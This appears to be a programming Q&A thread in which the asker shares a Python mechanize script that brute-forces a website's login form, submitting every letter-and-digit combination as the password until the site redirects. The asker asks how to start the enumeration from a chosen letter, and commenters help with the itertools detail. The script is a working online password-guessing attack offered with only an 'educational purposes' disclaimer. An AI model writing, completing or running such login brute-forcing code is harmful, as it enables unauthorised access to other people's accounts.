# How can i start itertools combinations from specific letter/digit to apply it on HTML form?

Tags: python, mechanize

## Notice:

First of all i am doing this for educational purposes only, i am not trying to hurt anyone or destroy anything with this.

---

I have code like this:

```
start = 1
end = 2
for length in range(start, end+1):
    for c in itertools.combinations_with_replacement(string.ascii_letters + string.digits, length):
```

this will print every uppercase/lowercase letter from A to Z and after all letters are finished, It will start printing all digits from 0 to 9. so it looks like this: `abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789`

After first cycle is done, it goes on second one and does the same thing. like this:

First cycle starting: a

Second cycle starting: aa

and etc.

---

This is how can i do it:

```
def loop1():
    br.open("somewebsite")
    start = 1
    end = 2
    for length in range(start, end+1):
        for c in itertools.combinations_with_replacement(string.ascii_letters + string.digits, length):
            br.select_form(nr=4)  
            br.set_all_readonly(False)
            br.form['password'] = ''.join(c)
            print "Testing",br.form['someform'] 
            br.method = "POST"
            response = br.submit()
            if response.geturl()=="somewebsiteredirect":
                print "Test is ",''.join(x)
                break
```

This will fill out form with every uppercase/lowercase letter and number in range of 2, When website redirects to main page script will print which combination worked. (Again: i'm using this for educational purposes **ONLY**)

---

## what i want it to do:

I want to start combinations from specific letter or digit.

Like this:

**Combination 1:**

First cycle starting: b

Second cycle starting: ba

If it is not possible, then like this:

**Combination 2:**

First cycle starting: b

Second cycle starting: bb

**So is it possible to use Itertool to start combinations from specific letter/digit and put its output in HTML forms using Mechanize?**

Comment: I'm not entirely sure what you're saying. Let's suppose you just want to use the letters `abc` as your alphabet and you're interested in finding string of length 2. Do you want a function where the input is `'b'` and the output is `['ba', 'bb', 'bc', 'ca', 'cb', 'cc']`?

Comment: Are you aware that `itertools.combinations_with_replacement` considers items with the same values in different orders to be duplicates and only produces one? For example, `itertools.combinations_with_replacement('ab', 2)` gives `[('a', 'a'), ('a', 'b'), ('b', 'b')]` - note that there's `('a', 'b')` but no `('b', 'a')`.

Comment: i want  itertools.combinations_with_replacement to start from specific letter, like it normally starts from A, but i want it to start from B. @Alex Hall

Comment: Please just answer my question. Yes or no, does that output look right?

Comment: @Alex Hall no , output should look like this (without braces): [B, A] [B, B] [B, C] etc.

Comment: I'm not referring to details like quotes and capital letters, I want the full list of combinations, so don't give me 'etc'.

Comment: i'm sorry for doing that at first, and thanks for solving my problem, i tried this: `for c in itertools.combinations_with_replacement('bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', length):` in my loop and it started doing exactly as i wanted, Thanks again!

Comment: But that won't produce the combination `ba`. Is that OK?

Comment: yeah thats not the problem.